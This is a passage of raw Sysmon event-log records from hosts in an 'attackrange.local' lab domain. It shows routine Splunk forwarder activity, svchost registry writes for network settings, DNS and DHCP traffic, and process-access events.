Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:54.047{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90E-60EB-187E-00000000CF01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.032{466BC892-F90E-60EB-187E-00000000CF01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x80000000000000001055701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:55.564{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A9B3CF3BC6ADC0899E29E3D0D75D6D,SHA256=4114BB7A164D5C4D6001A61C7CB3991DE37709FEE9CD1C3F3C55BD3001E79513,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:53.330{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om57250-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001055700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:47.269{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57504-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001055699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:55.032{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43E2E10DBA0AB0426A114EB3B2D965EC,SHA256=4B4D2BFA1AE567BC7E13DFCE187F73E6E6917364E98E1E5F8A13FCAE1494C1A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:56.595{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=257DE34B13F53894681BBCFC62B22AF3,SHA256=E13C2A6E6CEC7003DE14F6A92242F96F8C0E4705ACDD8AF8B8539ECD0A9EE589,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:53.882{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57504-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:55.999{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA35A1EFBDD4AA7D1436B06978FD5DF0,SHA256=890740B1528D4319AA70E56165800DE651343977F0DB66609464AC268597016E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:57.595{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B487AEC38E95B0A072E594A162BA5C4B,SHA256=068BB9B0EF6E321C898F22582142E9F4D0547A96A12E3824DAE809FFB09FE0E4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000810973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\RegisteredSinceBootDWORD (0x00000001) 
13241300x8000000000000000810972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\StaleAdapterDWORD (0x00000000) 13241300x8000000000000000810971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\CompartmentIdDWORD (0x00000001) 13241300x8000000000000000810970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\FlagsDWORD (0x00000002) 13241300x8000000000000000810969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\TtlDWORD (0x000004b0) 13241300x8000000000000000810968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\SentPriUpdateToIpBinary Data 13241300x8000000000000000810967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 
08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\SentUpdateToIpBinary Data 13241300x8000000000000000810966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\DnsServersBinary Data 13241300x8000000000000000810965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\HostAddrsBinary Data 13241300x8000000000000000810964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\PrimaryDomainNameattackrange.local 13241300x8000000000000000810963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\AdapterDomainName(Empty) 13241300x8000000000000000810962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\Hostnamewin-host-623 
13241300x8000000000000000810961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{2B0C185B-F983-408E-82DE-41C78B045D4C}\RegisteredSinceBootDWORD (0x00000001) 13241300x8000000000000000810960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000810959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000810958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000810957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\LeaseTerminatesTimeDWORD (0x60ec0721) 13241300x8000000000000000810956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 
08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\T2DWORD (0x60ec055f) 13241300x8000000000000000810955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\T1DWORD (0x60ec0019) 13241300x8000000000000000810954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\LeaseObtainedTimeDWORD (0x60ebf911) 13241300x8000000000000000810953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\LeaseDWORD (0x00000e10) 13241300x8000000000000000810952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpServer10.0.1.1 13241300x8000000000000000810951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000810950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 
08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpIPAddress10.0.1.15 13241300x8000000000000000810949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:10:57.233{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2b0c185b-f983-408e-82de-41c78b045d4c}\DhcpInterfaceOptionsBinary Data 23542300x8000000000000000810948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:56.999{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE09A5C08CF946994A7E14860DB80D28,SHA256=B3BA21A5255DE1771FA3897619C22653AEA032B4AE1504D137F1DD01A74344E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:57.479{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:58.613{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B8D40A6E4C2F8E5824855E2FCE01FD,SHA256=138F35CD41D0C58EC2011736EB07076E246DC66439ACD2E1C245A03C64AFC628,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:57.382{0C1E0330-0490-60E8-1200-00000000D001}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 23542300x8000000000000000810974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:58.015{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245865479753D9195FE71A9585376088,SHA256=AA5CCC14DDAFDD3ECA22A66557818418224D89545D733AD2547953F30E60141E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.763{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal51230- 354300x80000000000000001055706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.762{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal63435- 23542300x80000000000000001055705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:58.263{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf7a6cdc.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:59.632{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB12367DCFE7CA126C3ED428722671A9,SHA256=55115B7CB4B192FBD454CE5325AEB450BA1BA52AF470D2E946D438A7943C9789,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:59.688{0C1E0330-048F-60E8-0B00-00000000D001}6282788C:\Windows\system32\lsass.exe{0C1E0330-048D-60E8-0100-00000000D001}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x8000000000000000810978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:57.391{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:c810:752:c94:ffff-62139-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000810977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:57.391{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:953:af5f:887a:72awin-host-623.attackrange.local62139-trueff02:0:0:0:0:0:1:3-5355llmnr 23542300x8000000000000000810976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:59.016{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2650FC5EBDD43C44519E6EC79F56D451,SHA256=893D85834EEF7BDDA5C97F29CB9FE4976A70CCA480C7459182A2CAD6A74FC644,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.986{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62015-false10.0.1.12-8089- 354300x80000000000000001055709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.910{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60126- 10341000x80000000000000001055721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:00.747{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program 